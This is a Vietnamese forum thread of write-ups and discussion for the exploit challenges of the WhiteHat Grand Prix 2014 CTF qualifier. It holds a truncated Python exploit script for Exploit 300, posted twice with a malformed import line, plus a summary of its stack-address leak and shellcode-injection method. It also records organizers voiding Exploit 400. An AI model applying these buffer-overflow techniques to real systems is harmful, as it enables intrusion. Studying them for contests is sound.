[Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

BkavCR

VIP Members
27/09/2013
105
203 bài viết
[Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014
Link tải đề:

Exploit 300
http://grandprix.whitehat.vn:8020/DABA0E7C3FA64CD98C0A927FB975FEF/exploit300.zip

Connect --> grandprix.whitehat.vn:7007
Gợi ý: Môi trường Windows XP SP3

Exploit 400
http://grandprix.whitehat.vn:8020/BE84FDB1E04B1E6E9AABA0325069D5B6/exploit400.zip
Connect --> grandprix.whitehat.vn:6007

Môi trường: Windows 7 /NXCOMPAT:NO

Cập nhật bài Exploit 400:
Ban tổ chức đã kiểm tra lại bài Exploit 400 và nhận thấy do sơ suất trong quá trình up đề đã không cung cấp đủ thông tin về các module được load trên server dẫn đến việc các đội chơi không thể tìm thấy địa chỉ trả về để ghi đè cho shellcode hoạt động. Vì thế bài exploit 400 sẽ không được tính điểm trong kết quả chung cuộc
Ban tổ chức thành thật xin lỗi các đội chơi về sự cố ngoài ý muốn này.


Mời các bạn viết Writeup và cùng thảo luận về Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014.

____________________________________________________________

BQT cập nhật Writeup của team ___BAMB00__ để các bạn cùng tham khảo:

Exploit 300:
Mã:
import ctypesimport sys
import socket
import base64
import struct


if sys.argv[1] == "1":
    IP = "grandprix.whitehat.vn"
    PORT = 6007
else:
    IP = "192.168.0.103"
    PORT = 2307
s = socket.create_connection((IP, PORT))
def r():
  time.sleep(1)
  return s.recv(8192)




print s.recv(1024)


call_read_flag = "xE8x75xDCxFFxFF"
send_flag = "xE8x07xE0xFFxFF"
eip = struct.pack("
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

Ban tổ chức nên mở lại bài để mọi người có thể làm lại :))
Mình cũng muốn thấy solution của ban tổ chức bài exploit400 là như thế nào :)) vì bài này trên máy ảo của mình Windows 7 SP1 32 bit Professional thì mình find đủ Gadgets để tìm bắt đầu của buffer và jmp tới nó (chưa test trên server) :D
Một phần thì thấy bài exploit400 hơi phiêu phiêu ( phụ thuộc vào dll của HĐH )
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

Hóng writeup từ ban tổ chức. Bài này mình đã chạy thành công trên mấy Windows 7 SP1 32 bit, nhưng khi chạy trên server thì không thành công :3 Không hiểu server là Windows 7 sp mấy, x64 hay x86?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

tesla123;15779 đã viết:
Ban tổ chức nên mở lại bài để mọi người có thể làm lại :))
Mình cũng muốn thấy solution của ban tổ chức bài exploit400 là như thế nào :)) vì bài này trên máy ảo của mình Windows 7 SP1 32 bit Professional thì mình find đủ Gadgets để tìm bắt đầu của buffer và jmp tới nó (chưa test trên server) :D
Một phần thì thấy bài exploit400 hơi phiêu phiêu ( phụ thuộc vào dll của HĐH )
BTC sẽ mở lại đề sớm để các tất cả mọi người có thể vào tham khảo.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

Exploit 300:
Mã:
import ctypesimport sys
import socket
import base64
import struct


if sys.argv[1] == "1":
    IP = "grandprix.whitehat.vn"
    PORT = 6007
else:
    IP = "192.168.0.103"
    PORT = 2307
s = socket.create_connection((IP, PORT))
def r():
  time.sleep(1)
  return s.recv(8192)




print s.recv(1024)


call_read_flag = "xE8x75xDCxFFxFF"
send_flag = "xE8x07xE0xFFxFF"
eip = struct.pack("
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

vhnvn;15816 đã viết:
Exploit 400:
Bài này BTC ra đề có vẻ như ko giải đc :), hi vọng sớm có sol từ BTC.
BTC đã chuyển vấn đề cho Ban ra đề, các bạn ấy sẽ phản hồi sớm nhé.
P/S: bạn vhnvn đến từ team nào vậy?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

tesla123;15779 đã viết:
Ban tổ chức nên mở lại bài để mọi người có thể làm lại :))
Mình cũng muốn thấy solution của ban tổ chức bài exploit400 là như thế nào :)) vì bài này trên máy ảo của mình Windows 7 SP1 32 bit Professional thì mình find đủ Gadgets để tìm bắt đầu của buffer và jmp tới nó (chưa test trên server) :D
Một phần thì thấy bài exploit400 hơi phiêu phiêu ( phụ thuộc vào dll của HĐH )

Bản chất của việc Research trên môi trường thực tế cũng giống như vậy. Đó là lý do tại sao Càng tới các phiên bản windows về sau, nhất là 8.1 hiện tại ta research os hoặc app khó khăn hơn
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

tesla123;15779 đã viết:
Ban tổ chức nên mở lại bài để mọi người có thể làm lại :))
Mình cũng muốn thấy solution của ban tổ chức bài exploit400 là như thế nào :)) vì bài này trên máy ảo của mình Windows 7 SP1 32 bit Professional thì mình find đủ Gadgets để tìm bắt đầu của buffer và jmp tới nó (chưa test trên server) :D
Một phần thì thấy bài exploit400 hơi phiêu phiêu ( phụ thuộc vào dll của HĐH )

vhnvn;15816 đã viết:
Exploit 400:
Bài này BTC ra đề có vẻ như ko giải đc :), hi vọng sớm có sol từ BTC.

Cảm ơn ý kiến phản hồi từ các bạn. Bài Exploit 400 quả thật có vấn đề vì cung cấp thiếu thông tin tới người chơi.
BTC đã cập nhật vấn đề của bài Exploit 400 ở #1 của Topic.
Thành thật xin lỗi các bạn vì sự cố này.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

sunny;15817 đã viết:
BTC đã chuyển vấn đề cho Ban ra đề, các bạn ấy sẽ phản hồi sớm nhé.
P/S: bạn vhnvn đến từ team nào vậy?

Chào a, e từ team ___BAMB00__ :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Writeup] Chủ đề Exploit - Vòng loại WhiteHat Grand Prix 2014

Exploit300:
Khi mà ASLR=off, DEP=off thì mọi thứ đơn giản.
Bài này nhiều cách giải, và có những cách giải tối ưu, nhưng trong thời gian thi mình chỉ làm cách nhanh nhất có thể :D.
Mình return về 0x00401085 để leak địa chỉ stack, sau đó input shellcode và return vào thôi.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên